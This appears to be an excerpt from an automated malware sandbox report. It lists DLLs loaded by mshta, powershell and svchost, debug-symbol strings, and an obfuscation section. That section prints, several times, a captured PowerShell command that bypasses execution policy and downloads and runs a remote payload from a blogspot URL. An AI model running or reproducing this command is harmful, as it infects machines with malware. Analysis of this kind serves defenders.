                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: dbghelp.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: wtsapi32.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: edgegdi.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: sxs.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: dpapi.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: dbghelp.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: wtsapi32.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: edgegdi.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: sxs.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: dpapi.dll
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe, 00000022.00000002.289639624751.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp, elevation_service.exe, 00000022.00000000.289636577659.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp
                      Source: Binary string: wkernel32.pdb source: svchost.exe, 00000013.00000003.289414994151.0000000005320000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414786038.0000000005200000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: svchost.exe, 00000013.00000003.289411881417.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289412522901.00000000053F0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289635046903.0000022D0CFF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289634553663.0000022D0CE00000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289666544287.00000217CE5E0000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289667109372.00000217CE7D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000013.00000003.289413502649.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414086820.00000000053A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: svchost.exe, 00000013.00000003.289411881417.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289412522901.00000000053F0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289635046903.0000022D0CFF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289634553663.0000022D0CE00000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289666544287.00000217CE5E0000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289667109372.00000217CE7D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: svchost.exe, 00000013.00000003.289413502649.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414086820.00000000053A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe, 00000022.00000002.289639624751.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp, elevation_service.exe, 00000022.00000000.289636577659.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_elf.dll.pdb source: msedge.exe, 00000026.00000002.289674194363.00007FFB6AFC5000.00000002.00000001.01000000.00000015.sdmp
                      Source: Binary string: AvastBrowserUpdate_unsigned.pdb source: AvastBrowserUpdate.exe
                      Source: Binary string: wkernelbase.pdbUGP source: svchost.exe, 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: svchost.exe, 00000013.00000003.289414994151.0000000005320000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414786038.0000000005200000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_elf.dll.pdbOGP source: msedge.exe, 00000026.00000002.289674194363.00007FFB6AFC5000.00000002.00000001.01000000.00000015.sdmp

                      Data Obfuscation

                      barindex
                      JScript performs obfuscated calls to suspicious functions
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("powershell", "-ep Bypass -c [Net.ServicePointManager]", "", "open", "0");
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 3.2.powershell.exe.29a437d0000.0.raw.unpack, W3mIAMad8mK4ZyYb8CQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA0447A CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,52_2_6BA0447A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031D5D5E push esi; ret 7_2_031D5D69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031D1F6A push eax; ret 7_2_031D1F75
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031D4F89 push edi; iretd 7_2_031D4F96
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031D31DC push eax; ret 7_2_031D31DD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031D4FD4 push ss; retf 7_2_031D4FF5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031D3C39 push ecx; ret 7_2_031D3C59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031D625D push es; ret 7_2_031D6264
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031D20F9 push FFFFFF82h; iretd 7_2_031D20FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031D54F9 push edx; retf 7_2_031D54FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031D38EC push edi; ret 7_2_031D38F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06946951 push es; retf 7_2_06946957
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06546951 push es; retf 8_2_06546957
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeCode function: 12_2_00DD0710 push 6AA6DA9Ah; retn 0000h12_2_00DD0715
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_3_00774054 push ss; retf 19_3_00774075
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_3_0077225C push eax; ret 19_3_0077225D
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_3_00774009 push edi; iretd 19_3_00774016
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_3_007752DD push es; ret 19_3_007752E4
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_3_00772CB9 push ecx; ret 19_3_00772CD9
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_3_00771179 push FFFFFF82h; iretd 19_3_0077117B
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_3_00774579 push edx; retf 19_3_0077457C
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_3_0077296C push edi; ret 19_3_00772978
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_3_00770FEA push eax; ret 19_3_00770FF5
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_3_00774DDE push esi; ret 19_3_00774DE9
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeCode function: 20_3_02774054 push ss; retf 20_3_02774075
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeCode function: 20_3_0277225C push eax; ret 20_3_0277225D
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeCode function: 20_3_02774009 push edi; iretd 20_3_02774016
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeCode function: 20_3_027752DD push es; ret 20_3_027752E4
